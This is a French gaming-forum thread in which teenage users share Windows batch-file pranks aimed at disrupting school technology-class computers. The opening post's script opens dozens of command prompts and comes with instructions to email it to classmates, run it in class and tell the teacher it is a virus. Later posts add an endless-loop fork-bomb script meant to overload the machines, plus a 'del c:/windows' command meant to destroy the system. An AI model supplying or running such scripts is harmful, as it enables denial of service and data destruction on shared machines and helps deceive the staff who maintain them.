YOUPASS - convertir le crédit téléphonique en monnaie ! : Partenaire RealityGaming.fr

C'est la fin de l'année ? Envie d'énerver les profs de techno ? :)

Statut
N'est pas ouverte pour d'autres réponses.

Sulfus

Videomaker
Ancien staff
Inscrit
10 Janvier 2012
J'aime
2 256
Reply from Sulfus Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #1
Hello :D

Alors voilà , c'est une petite astuce que m'a donner mon frère pour énerver un peu les profs de techno en fin d'année puisque je vais changer de collège disons qu'il faut bien que je m'amuse un peu et je pense que vous avez déja pensé à cette idée dans votre tête pour la fin de l'année

Mais le problème c'est que sur les PC les permissions d'admin sont désactivés et c'est un peu énervant si ont veut faire quelques conneries sur le PC avant de partir bronzer au soleil :)

Alors voilà quelques astuces très simple et très rapide à réaliser qui feront chauffer vos profs comme des fous

Pour ma part le mien à peter un cable et j'ai demandé à un ami prof de techno qui m'a dit qu'ils avaient passer la soirée à débugger les ordis :)

Alors c'est très simple , pour plus de discrétion et de rapidité faites ça d'abord chez vous et puis ensuite envoyez le sur l'email de tout vos amis qui le téléchargeront directement au collège et qui le lanceront!

Allez sur votre bloc notes écrivez un nouveau fichier avec écrit :

echo

start
Save sous "fichier.bat" changer l'extension .txt par bat et pour le nom du fichier , mettez ce que vous voulez par rapport à l'histoire que vous raconterez au Prof !

Vous remarquerez qu'en lançant le programme le cmd.exe (invite de commande apparaît !)

Ce que vous ne savez pas c'est que si vous mettez plusieurs fois " Start " sur chaque ligne, le CMD s'ouvrira plusieurs fois à chaque clic dessus

Exemple :

echo

start
start
start
A chaque clic il s'ouvrira 3 fois !

Mettez start environ 30 fois puis envoyé le sur l'email de vos amis , une fois en techno , dites à vos amis de le télécharger , réfléchissez à une bonne histoire et demandez à tout vos amis de cliquer plusieurs fois dessus , appellez le prof et montrez lui :D

Le prof va arrivé , et bien sur va vouloir tout supprimé !

En le supprimant si tout se passe bien , l'ordinateur affichera un message d'erreur , si vous appuyez sur OK , un nouveau reviendra ! Et ainsi de suite ( 1 message par CMD ouvert , imaginez si vous avez ouvert 1000 cmd.exe le nombre de fenêtres à fermé, si il redémarre l'ordinateur , relancez le programme et il deviendra complètement dingue !

Une fois que vous avez lancé le programme plusieurs fois cachez le quelquepart avant de l'appeler histoire que le prof ne le trouve pas ! Et enjoy la rigolade , hésitez pas à balancer vos histoire de virus et tout ça :D

Sinon pour mon histoire , ont avait tous lancé le programme et ont lui avait fait croire qu'en ouvrant son archive par email du travail que nous devions faire il y avait un virus :)

Allez enjoy cette petite astuce bien sympa pour faire les cons en fin d'année sans se faire chopper !

Gui_

Membre Premium
Premium
Inscrit
17 Avril 2012
J'aime
497
Reply from Gui_ Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #4
LOL :rire2:

The_Dock

B2O Ma gl
Premium
Inscrit
20 Décembre 2011
J'aime
206
Reply from The_Dock Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #5
On est trois :rire2:

Inscrit
24 Mars 2012
J'aime
121
Reply from ɱiɳiĠuɳ Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #6
Ben c'est simple à enlever lol: ALTGR + CTRL + SUPPR, tu vas dans le processus et tu arrêtes le processus.

PEGGAE

Gérant de Argents-Facile
Ancien staff
Inscrit
1 Septembre 2011
J'aime
2 187
Reply from PEGGAE Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #7
Pour ce qui ont pas compris sa ouvre plusieurs " inviter de commande " genre 10 000 et quand on le ferme sa met un message d'erreur .

Ben c'est simple à enlever lol: ALTGR + CTRL + SUPPR, tu vas dans le processus et tu arrêtes le processus.
Exacte XD

Sulfus

Videomaker
Ancien staff
Inscrit
10 Janvier 2012
J'aime
2 256
Reply from Sulfus Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #8
J'ai une parade pour le processus.

Tiens !

Go bloc note et colle ça :
echo off
title [Piratage en cours..]
mode con cols=999 lines=999
color 0a
:sulfus
start
start
start
echo %random%%random%%random%%
random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
goto sulfus
enrengistre le .txt en .bat et lance le ! Surprise :)

Bananosucre

Ingénieur en chef
Premium
Inscrit
13 Mai 2011
J'aime
277
Reply from Bananosucre Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #9
Sinon on peut faire ça (pour les sadiques) :

Code:
[USER=9684]echo[/USER] off

del c:/windows
Et bim plus d'ordi :diable:

Sulfus

Videomaker
Ancien staff
Inscrit
10 Janvier 2012
J'aime
2 256
Reply from Sulfus Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #10
Sinon on peut faire ça (pour les sadiques) :

Code:
[USER=9684]echo[/USER] off

del c:/windows
Et bim plus d'ordi :diable:

Commande qui ne marchera pas à ton collège ou Lycée :)

Sulfus

Videomaker
Ancien staff
Inscrit
10 Janvier 2012
J'aime
2 256
Reply from Sulfus Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #12
Car il faut des permissions administrateur pour touche au dossier Windows , chose que tu n'a pas dans ton collège (sauf si ils sont con..) sinon tente le code que j'ai mis quelques messages en haut , pas besoin de permission d'admin et tu peut péter l'ordi facilement ( Si l'utilisation des processus par l'ordi atteint 100% , il pète)

Bananosucre

Ingénieur en chef
Premium
Inscrit
13 Mai 2011
J'aime
277
Reply from Bananosucre Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #13
Car il faut des permissions administrateur pour touche au dossier Windows , chose que tu n'a pas dans ton collège (sauf si ils sont con..) sinon tente le code que j'ai mis quelques messages en haut , pas besoin de permission d'admin et tu peut péter l'ordi facilement ( Si l'utilisation des processus par l'ordi atteint 100% , il pète)
Mon ordi à déjà atteint les 100% et il a pas péter

Inscrit
2 Février 2012
J'aime
78
Reply from Yass' Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #14
j'ai pas compris le truck j'ai tout lit en entier pourtent :/

Bananosucre

Ingénieur en chef
Premium
Inscrit
13 Mai 2011
J'aime
277
Reply from Bananosucre Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #15
j'ai pas compris le truck j'ai tout lit en entier pourtent :/
En gros tu crée un fichier '.bat' qui actionne l'ouverture du 'cmd' (invite de commande) plus tu met de 'start', plus de 'cmd' s'ouvrent.

Inscrit
2 Février 2012
J'aime
78
Reply from Yass' Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #16
mais les dossier je les crée a partir d'ou

Bananosucre

Ingénieur en chef
Premium
Inscrit
13 Mai 2011
J'aime
277
Reply from Bananosucre Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #17
mais les dossier je les crée a partir d'ou
Tu écris ce qu'a dis plus haut Sulfus dans le bloc-note, tu enregistres et tu renomme l'extension en '.bat'. Et là tu l'ouvres dans le PC du lycée et plus d'ordi :cool:

I MaGiiK

Challenge Lobby PS3 DISPO
Ancien staff
Inscrit
17 Mars 2011
J'aime
1 212
Reply from I MaGiiK Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #18
Merci il va serrer mon prof en + il a 62 ans ^^

Gui_

Membre Premium
Premium
Inscrit
17 Avril 2012
J'aime
497
Reply from Gui_ Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #19
Vouscetes diabolique avec leur ordi :)

Sulfus

Videomaker
Ancien staff
Inscrit
10 Janvier 2012
J'aime
2 256
Reply from Sulfus Corbeille 📒 : C'est la fin de l'année ? Envie d'énerver les profs de techno ? :) #20
Mon ordi à déjà atteint les 100% et il a pas péter
Laisse mon code 10 minute sur tes ordis de collège ( qui sont probablement nul) et si ils vont pétés ou en tout cas surchauffé totalement.

Statut
N'est pas ouverte pour d'autres réponses.